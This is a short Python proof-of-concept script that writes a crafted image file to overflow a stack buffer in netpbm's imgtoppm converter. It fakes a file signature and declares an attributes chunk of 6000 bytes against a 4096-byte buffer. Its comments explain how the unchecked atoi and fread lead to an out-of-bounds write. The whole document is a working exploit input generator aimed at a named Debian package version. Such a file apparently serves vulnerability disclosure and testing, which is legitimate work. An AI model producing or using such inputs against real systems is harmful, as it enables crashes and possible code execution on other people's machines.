#!/usr/bin/env python3
# PoC generator for netpbm imgtoppm stack-buffer-overflow (CWE-121/CWE-787)
# Tested against Debian/Kali netpbm 2:11.13.03+ds-2
sig    = b"IMG\x00\x00\x00\x00\x00"   # 8-byte signature (NOT validated by imgtoppm)
tag    = b"AT"                          # "AT" attributes chunk
length = b"00006000"                    # 8 ASCII digits -> atoi() -> 6000 (no clamp to sizeof buf=4096)
payload= b"A" * 6000                     # 6000 bytes -> fread(buf,6000,1) into buf[4096] => OOB write
open("poc_img.img","wb").write(sig+tag+length+payload)
print("wrote poc_img.img:", 8+2+8+6000, "bytes")